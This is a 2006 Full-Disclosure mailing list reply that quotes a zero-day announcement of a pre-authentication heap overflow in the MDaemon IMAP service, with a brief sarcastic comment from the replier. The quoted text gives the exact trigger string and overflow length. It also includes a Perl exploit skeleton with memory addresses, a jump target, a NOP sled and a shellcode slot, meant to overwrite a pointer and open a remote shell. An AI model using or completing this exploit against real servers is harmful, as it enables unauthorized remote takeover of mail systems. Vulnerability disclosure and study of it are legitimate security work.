[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <4479A819.9050001@heapoverflow.com>
Date: Sun May 28 14:40:13 2006
From: ad at heapoverflow.com (ad@...poverflow.com)
Subject: *zeroday warez* MDAEMON LATEST VERSION PREAUTH
REMOTE ROOT HOLE *zeroday warez*
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
if this is about "how to ruin a discovery" do you excel dude, keep it up.
kcope wrote:
> MDAEMON LATEST VERSION PREAUTH *REMOTE ROOT HOLE*
>
> zeroday discovered by kcope kingcope[at]gmx.net !!!
> shouts to alex,wY!,bogus,revoguard,adizeone
>
> Description
> There's a remotely exploitable preauthentication hole in Alt-N MDaemon.
> It is a Heap Overflow in the IMAP Daemon.
> It can be triggered by sending the following attack string:
> a001 "[X]\r\n
> Look specifically at the " it is important :)
> [X] consists of f.e. 99555 Z's to reach the 4 byte overwrite.
> Now one can use the 4 byte overwrite in some PEB pointer overwrite to
> open a remote shell. UnhandledExceptionFilter is also possible I think.
> No exploit is delivered at this time, figure it out yourself (use the
PEB Lock) :)
>
> Sample code:
> $where = "\x4c\x14\xed\x77"; # UnhandledExceptionFilter 77ED144C
> #$where = "\x20\xf0\xfd\x7f"; # PEB Lock Pointer 7FFDF000
> $what = "\x3d\xb9\x82\x02"; # JMP EDX 03bfcb9A
>
> $nops = "A" x 100;
> $a = $nops . $shellcode . ("Z" x
(0x2006-length($shellcode)-length($nops))) . $what . $where . ("Z" x
(0x184AC - 0x200A - 12));
> print $sock "a001 \"$a\r\n";
> close($sock);
>
> Best Regards,
> kcope
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>
> __________ NOD32 1.1562 (20060527) Information __________
>
> This message was checked by NOD32 antivirus system.
> http://www.eset.com
>
>
>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2.1 (MingW32)
iD8DBQFEeagZFJS99fNfR+YRAtC0AKCqXObGub6D/HKJLWnA/q9pHBECbACcDhC+
DA09IzPTR128Wi+tYU6gohg=
=TBDv
-----END PGP SIGNATURE-----
-------------- next part --------------
A non-text attachment was scrubbed...
Name: ad.vcf
Type: text/x-vcard
Size: 167 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20060528/2026f7e9/ad.vcf
Powered by blists - more mailing lists